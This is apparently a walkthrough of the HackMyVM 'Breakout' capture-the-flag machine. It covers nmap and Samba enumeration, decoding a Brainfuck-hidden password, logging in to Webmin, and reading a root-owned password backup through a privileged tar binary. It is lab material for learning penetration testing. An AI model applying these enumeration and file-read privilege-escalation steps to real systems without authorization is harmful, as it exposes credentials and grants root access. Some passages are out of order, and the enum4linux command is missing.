In this write-up, I will guide you through the steps I took to complete the HackMyVM - Breakout CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video .
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA breakout 172.16.101.74
Explanation:
nmap: Tool used to scan network and ports to discover which services are running.
-sV: Perform version detection of services.
-sC: Scan using default scripts.
-oA: Output in filename "breakout".
172.16.101.74: IP address of Breakout VM on my network.
Output:
# Nmap 7.94SVN scan initiated Thu Aug 22 00:31:05 2024 as: nmap -sC -sV -vv -oA nmap/breakout 172.16.101.74
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+) '
Nmap scan report for 172.16.101.74
Host is up, received syn-ack (0.0026s latency).
Scanned at 2024-08-22 00:31:13 PDT for 42s
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
10000/tcp open http syn-ack MiniServ 1.981 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: FE08A1EE35C708AD85285F21B625A0FC
|_http-title: 200 — Document follows
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
20000/tcp open http syn-ack MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: BB90C57C0F5C0535492D436A42536B31
Host script results:
| smb2-time:
| date: 2024-08-22T07:31:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BREAKOUT<00> Flags: <unique><active>
| BREAKOUT<03> Flags: <unique><active>
| BREAKOUT<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 56402/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21538/tcp): CLEAN (Couldn't connect)
| Check 3 (port 29492/udp): CLEAN (Failed to receive data)
| Check 4 (port 55250/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 00:31:55 2024 -- 1 IP address (1 host up) scanned in 49.86 seconds
Findings: We see that there is a web server running on port 80, a Samba server and some other HTTP servers on port 10000 and 20000.
Let's check out the web server and in the background we can run gobuster and enum4linux to brute force web directories and any information about the Samba server respectively.
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.101.74 -w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Note: I have setup an alias to run gobuster inside a docker container.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.101.74: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt: Path of word list to use.
-a: Do all simple enumeration (-U -S -G -P -r -o -n -i).
172.16.101.74 : IP of the target samba server to enumerate.
Output:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 22 02:14:41 2024
=========================================( Target Information )=========================================
Target ........... 172.16.101.74
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 172.16.101.74 )===========================
[+] Got domain/workgroup name: WORKGROUP
===================================( Session Check on 172.16.101.74 )===================================
[+] Server 172.16.101.74 allows sessions using username '', password ''
================================( Getting domain SID for 172.16.101.74 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================( Users on 172.16.101.74 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
enum4linux complete on Thu Aug 22 02:15:13 2024
Findings:
A user cyber was found.
Visiting Web Page (Port 80)
This is a normal Apache landing page. Let's check the source code in case there is some extra information there. Open the page source code using the shortcut Ctrl + U.
On analysing the encoding, the website suggests that the Brainf*ck encoding is used.
.2uqPEfj3D<P'a-3
This looks like a password, we can try it out somewhere.
Visiting Web Page (Port 20000)
On visiting http://172.16.101.74:20000 the web page asks us to redirect to https://172.16.101.74:20000 (HTTPS).
Click on the link to visit the HTTPS web page.
We get a Webmin page with an authentication page.
User (cyber) Access
We can try the cyber username we found from the Samba enumeration and .2uqPEfj3D<P'a-3 password from decoding the encoded message.
The credentials work and we get a menu to the left.
On the bottom of the menu, there is an icon which will give you a shell access.
We can read the user flag from the user.txt file by running the command:
cat user.txt
Privilege Escalation
Listing the files and the permissions in the current directory (/home/cyber) shows that there is an executable tar which is owned by root and also has the permission to be executed as root.
On digging deeper, we can see that the tar executable is allowed to read all the files in the file system.
ChatGPT explanation:
After looking through the file system of the victim machine, we will find a hidden file at /var/backups/.old_pass.bak
The permissions show that the file is owned by the root user and only the root user has read and write permissions.
We can use the tar executable from the home directory to read the contents of the file, by compressing the .old_pass.bak file and then decompressing it again.
We start with compressing the file. Command:
./tar -cf password.tar /var/backups/.old_pass.bak
Then we decompress it.
Command:
./tar xvf password.tar
Let's check the permissions on the decompressed file. Command:
ls -l var/backups/.old_pass.bak
We see that the decompressed file is owned by the user cyber and the owner is allowed to read and write to the file.
Reading the decompressed file: Command:
cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
Looks like a password, we can try it with the root user.
Try using the username root and password Ts&4&YurgtRX(=~h on the Webmin authentication portal at https://172.16.101.74:20000/
We get access to the root from these credentials.
And finally, we can read the root flag:
cat rOOt.txt
This looks like an encoded message. We can use to figure out which encoding this is and then try to decode it.
We can decode the Brainfu*ked message using and we get the following output:
